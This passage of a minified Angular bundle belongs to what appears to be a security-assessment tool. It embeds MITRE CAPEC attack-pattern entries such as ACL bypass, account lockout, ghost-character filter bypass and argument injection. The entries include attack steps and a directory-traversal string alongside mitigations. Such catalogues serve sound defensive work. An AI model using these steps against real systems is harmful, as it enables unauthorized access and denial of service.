be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("isProject",!1)("assetGroup",e.dataService.Config.AssetGroups)("selectedNode",e.selectedNode)}}function Npt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"fact_check"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"general.Checklists"),"\n "))}function Lpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-checklists",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}const zpt=[{path:"configuration",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.locStorageService=n,this.dialog=r,this.router=c,this.route=d}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}ngOnInit(){if(this.dataService.Project){let e=!0;const i=this.locStorageService.Get(si.DIALOG_WARNING_CONSENT);if(i){const n=new Date(i),r=new Date;e=!(n.getMonth()==r.getMonth()&&n.getDate()==r.getDate())}if(e){const n={consent:!1,remember:!1};this.dialog.open(hut,{hasBackdrop:!1,data:n}).afterClosed().subscribe(c=>{c&&n.remember&&this.locStorageService.Set(si.DIALOG_WARNING_CONSENT,(new Date).toString())})}}this.router.events.subscribe(e=>{e instanceof Ph&&this.route.queryParams.subscribe(i=>{null!=i.index&&this.SetSelectedTabIndex(i.index)})})}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.selectedNode=null,this.locStorageService.Set(si.PAGE_CONFIG_TAB_INDEX,e)}GetSplitSize(){let e=this.locStorageService.Get(si.PAGE_CONFIG_SPLIT_SIZE_1);return null!=e?Number(e):350}OnSplitSizeChange(e){this.locStorageService.Set(si.PAGE_CONFIG_SPLIT_SIZE_1,e.sizes[0])}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r),Ee(vu),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-configuration"]],features:[ci],decls:101,vars:21,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/configuration",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"height","100%",3,"selectedIndex","selectedIndexChange"],["mat-tab-label",""],["matTabContent",""],[1,"tab-icon"],[3,"selectedNode","nodeTreeChanged"],[3,"selectedNode","componentType","nodeTreeChanged"],[3,"isProject","assetGroup","selectedNode","nodeTreeChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"mat-drawer-container",1),s(3,"\n "),m(4,"mat-drawer",2),s(5,"\n "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n "),u(),s(8,"\n\n "),m(9,"mat-drawer-content"),s(10,"\n "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r)}),s(12,"\n "),m(13,"as-split-area",5),s(14,"\n "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"as-split-area",8),s(20,"\n "),m(21,"mat-tab-group",9),he("selectedIndexChange",function(r){return i.SetSelectedTabIndex(r)}),s(22,"\n "),m(23,"mat-tab"),s(24,"\n "),ne(25,gpt,5,3,"ng-template",10),s(26,"\n "),ne(27,Cpt,3,1,"ng-template",11),s(28,"\n "),u(),s(29,"\n\n "),m(30,"mat-tab"),s(31,"\n "),ne(32,ypt,5,3,"ng-template",10),s(33,"\n "),ne(34,bpt,3,2,"ng-template",11),s(35,"\n "),u(),s(36,"\n\n "),m(37,"mat-tab"),s(38,"\n "),ne(39,Mpt,5,3,"ng-template",10),s(40,"\n "),ne(41,vpt,3,2,"ng-template",11),s(42,"\n "),u(),s(43,"\n\n "),m(44,"mat-tab"),s(45,"\n "),ne(46,Apt,5,3,"ng-template",10),s(47,"\n "),ne(48,Tpt,3,1,"ng-template",11),s(49,"\n "),u(),s(50,"\n\n "),m(51,"mat-tab"),s(52,"\n "),ne(53,Ept,5,3,"ng-template",10),s(54,"\n "),ne(55,Dpt,3,1,"ng-template",11),s(56,"\n "),u(),s(57,"\n\n "),m(58,"mat-tab"),s(59,"\n "),ne(60,xpt,5,3,"ng-template",10),s(61,"\n "),ne(62,wpt,3,1,"ng-template",11),s(63,"\n "),u(),s(64,"\n\n "),m(65,"mat-tab"),s(66,"\n "),ne(67,Ipt,5,3,"ng-template",10),s(68,"\n "),ne(69,Rpt,3,1,"ng-template",11),s(70,"\n "),u(),s(71,"\n\n "),m(72,"mat-tab"),s(73,"\n "),ne(74,Spt,5,3,"ng-template",10),s(75,"\n "),ne(76,kpt,3,1,"ng-template",11),s(77,"\n "),u(),s(78,"\n\n "),m(79,"mat-tab"),s(80,"\n "),ne(81,Ppt,5,3,"ng-template",10),s(82,"\n "),ne(83,Opt,3,3,"ng-template",11),s(84,"\n "),u(),s(85,"\n\n "),m(86,"mat-tab"),s(87,"\n "),ne(88,Npt,5,3,"ng-template",10),s(89,"\n "),ne(90,Lpt,3,1,"ng-template",11),s(91,"\n "),u(),s(92,"\n "),u(),s(93,"\n "),u(),s(94,"\n "),u(),s(95,"\n "),u(),s(96,"\n "),u(),s(97,"\n "),it(98,"app-status-bar"),s(99,"\n"),u(),s(100,"\n")),2&e&&(g(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),g(2),F("gutterSize",3)("restrictMove",!0),g(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),F("size",i.GetSplitSize())("visible",i.showLeftBar)("order",1),g(2),F("activeNode",i.selectedNode),g(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),F("size","*")("order",2),g(2),F("selectedIndex",i.GetSelectedTabIndex()))},dependencies:[Zh,Dp,oa,_u,gu,Nd,qh,V1,Mu,Uh,pf,_f,df,Wht,Qht,Aft,Dft,Sft,EZ,jft,upt,_pt,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1} .mat-tab-labels{display:block!important} .mat-tab-labels .mat-tab-label{padding:0 10px!important} .mat-tab-label{min-width:100px!important}"]}),t})()}];let Wpt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(zpt),Ms]}),t})();const Qp=JSON.parse('{"1":{"ID":"1","Name":"Accessing Functionality Not Properly Constrained by ACLs","Abstraction":"Standard","Status":"Draft","Description":"In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application\'s functionality; particularly URL\'s for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"17"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Brute force guessing of resource names","Brute force guessing of user names / credentials","Brute force guessing of function names / actions"]},{"Step":"2","Phase":"Explore","Description":"[Identify Functionality] At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions","Technique":["Use the web inventory of all forms and inputs and apply attack data to those inputs.","Use a packet sniffer to capture and record network traffic","Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment."]},{"Step":"3","Phase":"Experiment","Description":"[Iterate over access capabilities] Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.","Technique":"Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)"}]},"Prerequisites":{"Prerequisite":["The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.","The various resources, or individual URLs, must be somehow discoverable by the attacker","The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource."]},"Skills_Required":{"Skill":["In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":{"p":["In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \\"NoAccess\\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.","Having done so, any direct access to those protected Servlets will be prohibited by the web container.","In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic."]}},"Example_Instances":{"Example":{"p":["Implementing the Model-View-Controller (MVC) within Java EE\'s Servlet paradigm using a \\"Single front controller\\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.","If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"276"},{"CWE_ID":"285"},{"CWE_ID":"434"},{"CWE_ID":"693"},{"CWE_ID":"732"},{"CWE_ID":"1193"},{"CWE_ID":"1220"},{"CWE_ID":"1297"},{"CWE_ID":"1311"},{"CWE_ID":"1314"},{"CWE_ID":"1315"},{"CWE_ID":"1318"},{"CWE_ID":"1320"},{"CWE_ID":"1321"},{"CWE_ID":"1327"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow: ServicesFile Permissions Weakness"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Pattern, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Pattern, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}]}},"2":{"ID":"2","Name":"Inducing Account Lockout","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Investigate account lockout behavior of system] Investigate the security features present in the system that may trigger an account lockout","Technique":["Analyze system documentation to find list of events that could potentially cause account lockout","Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly","Determine another user\'s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain list of user accounts to lock out] Generate a list of valid user accounts to lock out","Technique":["Obtain list of authorized users using another attack pattern, such as SQL Injection.","Attempt to create accounts if possible; system should indicate if a user ID is already taken.","Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts."]},{"Step":"3","Phase":"Exploit","Description":"[Lock Out Accounts] Perform lockout procedure for all accounts that the attacker wants to lock out.","Technique":"For each user ID to be locked out, perform the lockout procedure discovered in the first step."}]},"Prerequisites":{"Prerequisite":["The system has a lockout mechanism.","An attacker must be able to reproduce behavior that would result in an account being locked."]},"Skills_Required":{"Skill":["No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Computer with access to the login portion of the target system"},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.","When implementing security features, consider how they can be misused and made to turn on themselves."]},"Example_Instances":{"Example":"A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"645"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1531","Entry_Name":"Account Access Removal"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"3":{"ID":"3","Name":"Using Leading \'Ghost\' Character Sequences to Bypass Input Filters","Abstraction":"Detailed","Status":"Draft","Description":"Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading \\"ghost\\" characters (extra characters that don\'t affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary\'s input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine if the source code is available and if so, examine the filter logic."},{"Step":"2","Phase":"Experiment","Description":"If the source code is not available, write a small program that loops through various possible inputs to given API call and tries a variety of alternate (but equivalent) encodings of strings with leading ghost characters. Knowledge of frameworks and libraries used and what filters they apply will help to make this search more structured."},{"Step":"3","Phase":"Experiment","Description":"Observe the effects. See if the probes are getting past the filters. Identify a string that is semantically equivalent to that which an adversary wants to pass to the targeted API, but syntactically structured in a way as to get past the input filter. That encoding will contain certain ghost characters that will help it get past the filters. These ghost characters will be ignored by the targeted API."},{"Step":"4","Phase":"Exploit","Description":"Once the \\"winning\\" alternate encoding using (typically leading) ghost characters is identified, an adversary can launch the attacks against the targeted API (e.g. directory traversal attack, arbitrary shell command execution, corruption of files)"}]},"Prerequisites":{"Prerequisite":"The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same."},"Skills_Required":{"Skill":["The ability to make an API request, and knowledge of \\"ghost\\" characters that will not be filtered by any input validation. These \\"ghost\\" characters must be known to not affect the way in which the request will be interpreted.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use an allowlist rather than a denylist input validation.","Canonicalize all data prior to validation.","Take an iterative approach to input validation (defense in depth)."]},"Example_Instances":{"Example":{"p":["Alternate Encoding with Ghost Characters in FTP and Web Servers","Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname \\"../test.txt\\" may erroneously allow access to that file if the pathname is specified as \\".../test.txt\\". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn\'t dot-dot), 2) some part of the input processing decided to strip off the \\"extra\\" dot, leaving the dot-dot behind.","Using the file system API as the target, the following strings are all equivalent to many programs:","As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt."],"div":[".../../../test.txt",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"41"},{"CWE_ID":"172"},{"CWE_ID":"179"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"183"},{"CWE_ID":"184"},{"CWE_ID":"20"},{"CWE_ID":"74"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Payload"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"4":{"ID":"4","Name":"Using Alternative IP Address Encodings","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Prerequisites":{"Prerequisite":["The target software must fail to anticipate all of the possible valid encodings of an IP/web address.","The adversary must have the ability to communicate with the server."]},"Skills_Required":{"Skill":["The adversary has only to try IP address format combinations.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Design: Default deny access control policies","Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":"An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"291"},{"CWE_ID":"173"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"5":{"ID":"5","Name":"Blue Boxing","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"220"}},"Prerequisites":{"Prerequisite":"System must use weak authentication mechanisms for administrative functions."},"Skills_Required":{"Skill":["Given a vulnerable phone system, the attackers\' technical vector relies on attacks that are well documented in cracker \'zines and have been around for decades.",{"Level":"Low"}]},"Resources_Required":{"Resource":"CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch"},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Implementation: Upgrade phone lines. Note this may be prohibitively expensive","Use strong access control such as two factor access control for administrative access to the switch"]},"Example_Instances":{"Example":"An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"6":{"ID":"6","Name":"Argument Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Discovery of potential injection vectors] Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).","Technique":["Manually cover the application and record the possible places where arguments could be passed into external systems.","Use a spider, for web applications, to create a list of URLs and associated inputs."]},{"Step":"2","Phase":"Experiment","Description":"[1. Attempt variations on argument content] Possibly using an automated tool, the attacker will perform injection variations of the arguments.","Technique":["Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).","Use a proxy tool to record results, error messages and/or log if accessible."]},{"Step":"3","Phase":"Exploit","Description":"[Abuse of the application] The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.","Technique":"Manually inject specific payload into targeted argument."}]},"Prerequisites":{"Prerequisite":["Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.","Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client."]},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.","Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.","Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise."]},"Example_Instances":{"Example":"A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. 